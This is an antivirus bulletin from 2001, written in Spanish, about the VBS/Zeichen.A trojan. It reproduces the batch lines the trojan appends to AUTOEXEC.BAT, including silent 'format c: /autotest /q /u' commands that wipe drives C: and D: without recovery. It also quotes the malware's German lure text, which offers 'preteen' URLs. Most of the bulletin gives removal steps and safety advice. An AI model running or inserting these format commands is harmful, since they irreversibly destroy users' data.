|
VSantivirus No. 289 - Año 5 - Lunes 23 de abril de 2001
Nombre: VBS/Zeichen.A
Tipo: Caballo de Troya
Fecha: 20/abr/01
Activo (In the wild): Si
Es un troyano escrito en Visual Basic Script (VBS). Simula ser un script capaz de obtener las direcciones de sitios con contenidos pornográficos. Cuando lo ejecutamos, agrega algunos comandos al archivo
C:\Autoexec.bat, e inmediatamente provoca el reinicio de Windows.
Los comandos agregados al archivo AUTOEXEC.BAT, realizan entonces un formateo de las unidades
C: y D: sin ninguna solicitud de permiso al usuario, y sin ninguna posibilidad de aplicar el comando UNFORMAT.
Esto funciona solo bajo Windows 95, 98, y Me.
El código en VBS tiene características polimórficas (cambia su método de encriptación entre distintos ejemplares del mismo virus).
Contiene también el siguiente comentario en alemán:
Um in den Genuß der wirklich guten Preteen URL`s zu kommen, einfach nur Doppelklick auf diese Datei ausführen. Die URL`s sind hier verschlüsselt, damit keine andere.
Person sehen kann, worum es hier geht.
Los comandos agregados al archivo C:\Autoexec.bat son los siguientes:
Echo off
cls
Echo VBS/W98.pedo1.HDFK.V2
Echo.
Echo {{{ The only Warning from {{{ ^_int21h_^ }}} Never touch Kid's }}}
Echo.
ctty nul
format c: /autotest /q /u
format d: /autotest /q /u
El mismo script reinicia a Windows. En el arranque, bajo MS-DOS, se mostrará entonces el siguiente mensaje:
VBS/W98.pedo1.HDFK.V2
{{{ The only Warning from {{{ ^_int21h_^ }}} Never touch Kid's }}}
Este comentario, parte de lo agregado al AUTOEXEC.BAT, se muestra mientras se procede al formateo de las unidades
C: y D: sin ningún otro tipo de advertencia ni mensaje de ninguna clase.
El tipo de formato realizado, impide además la posibilidad de recuperar la información de los discos borrados.
Para quitar este troyano de su sistema, debe ejecutarse un antivirus al día. Sin embargo, recuerde que si ejecuta el troyano antes, se procede a modificar el
AUTOEXEC.BAT y a reiniciar el PC, sin intervención alguna del usuario.
En el caso de que el usuario se percate de que al ejecutar un archivo, este reinicia la computadora, la única manera de evitar la ejecución del archivo
AUTOEXEC, es apagando la computadora inmediatamente, y luego de ello, intentar su reinicio a partir de un disquete, o ejecutando el menú de inicio.
Para ejecutar el menú de inicio se debe mantener pulsada la tecla CTRL o pulsar intermitentemente la tecla F8 en el arranque, hasta que aparezca dicho menú, luego seleccionar "Sólo símbolo del sistema", y proceder a la edición de AUTOEXEC.BAT
(EDIT AUTOEXEC.BAT), para quitar las líneas mencionadas.
Para iniciar desde un disquete de arranque, seguir las siguientes instrucciones:
Primero, genere un disquete de inicio desde "Mi PC", "Panel de control", "Agregar o quitar programas". Pulse en "Crear disco", y siga las instrucciones.
Para asegurarnos de que la computadora arrancará desde el disquete de inicio, debemos hacer algunos cambios en la configuración del BIOS.
Dejamos el disquete generado como "Disco de inicio" en la disquetera, y reiniciamos Windows, siguiendo estos pasos:
1. Al reiniciar la computadora, debemos pulsar la tecla SUPR o DEL (existen algunos modelos de computadoras que le solicitarán otro procedimiento para ello. En esos casos debe guiarse o bien por los mensajes que salgan en pantalla al comienzo, o bien por el manual o documentación que acompaña a su computadora, o bien preguntando en foros de ayuda como el de VSAyuda).
2. En las opciones de Setup del BIOS, debemos buscar y habilitar (si no lo estuviera), la opción "Boot Sequence" o similar como "A, C, ..." etc. o "A: -> C:", o "1st Boot Device" como "Floppy", "2nd Boot Device" como "IDE-0", o la que corresponda en su caso. De este modo nuestro PC podrá iniciar desde un disquete. Debemos grabar los cambios y salir para reiniciar la computadora. Generalmente podremos hacerlo pulsando F10, o siguiendo las instrucciones en pantalla.
IMPORTANTE: Es conveniente dejar esta opción deshabilitada luego de haber realizado todo el proyecto de restitución de los archivos borrados ("C, A, ...", "C: -> A:" o "1st Boot Device" como "IDE-0"), para evitar en el futuro iniciar por descuido con un disquete infectado.
3. Al volver a reiniciar la computadora, (con el disquete "Disco de inicio" en la disquetera A:), deberá salir un menú de opciones. Pulsamos Enter.
4. Cuando la pantalla nos muestre un A:>_ y un cursor parpadeando, escribimos lo siguiente, pulsando Enter al final de cada renglón:
C:\
CD WINDOWS\COMMAND
EDIT C:\AUTOEXEC.BAT
Borramos las líneas agregadas por el troyano.
Recuerde que este troyano se activa al ser ejecutado por el propio usuario, en forma accidental, o al ser engañado éste en forma premeditada para hacerlo.
Se recomienda no abrir archivos enviados sin su consentimiento, ni ejecutar nada descargado de Internet, sin revisarlo antes con uno o dos antivirus al día.
Fuente: Symantec
|
|